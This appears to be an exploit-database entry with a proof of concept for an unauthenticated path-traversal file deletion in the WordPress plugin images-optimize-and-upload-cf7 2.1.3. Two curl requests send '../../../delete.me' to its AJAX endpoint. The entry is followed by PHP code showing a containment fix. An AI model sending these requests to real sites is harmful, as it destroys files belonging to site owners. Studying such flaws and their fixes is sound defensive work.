## https://sploitus.com/exploit?id=WPEX-ID:2CE4C837-C62C-41AC-95CA-54BB1A6D1EEB
1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'
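
A defensive counterpart to step 4, added here and not taken from the plugin's source: a PHP containment check that canonicalises the requested file name and refuses anything that resolves outside the upload directory. The function names (`resolve_inside`, `delete_upload`) and the temporary directory layout are assumptions constructed for the demonstration.

```php
<?php
// Added example, not the plugin's code. Names and paths are hypothetical.

/**
 * Resolve $name inside $baseDir. Returns the canonical path, or null when the
 * target is missing, is not a regular file, or lies outside $baseDir.
 */
function resolve_inside(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, so the prefix comparison
    // below is made on the path that would actually be touched.
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // The trailing separator stops "/uploads-old" from matching "/uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

/** Delete a file only if it resolves inside the upload directory. */
function delete_upload(string $baseDir, string $name): bool
{
    $path = resolve_inside($baseDir, $name);
    return $path !== null && unlink($path);
}

// Constructed layout: <root>/delete.me and <root>/a/b/uploads/photo.jpg,
// so the upload directory sits three levels below the root, as in step 4.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cf7demo_' . bin2hex(random_bytes(4));
$uploads = $root . '/a/b/uploads';
mkdir($uploads, 0700, true);
touch($root . '/delete.me');
touch($uploads . '/photo.jpg');

// The file value from step 4, then a legitimate in-directory name.
var_dump(delete_upload($uploads, '../../../delete.me'));
var_dump(file_exists($root . '/delete.me'));
var_dump(delete_upload($uploads, 'photo.jpg'));
```

In a WordPress AJAX handler the same check would sit behind `check_ajax_referer()` and `current_user_can()`, since the requests in steps 3 and 4 are sent without any credentials.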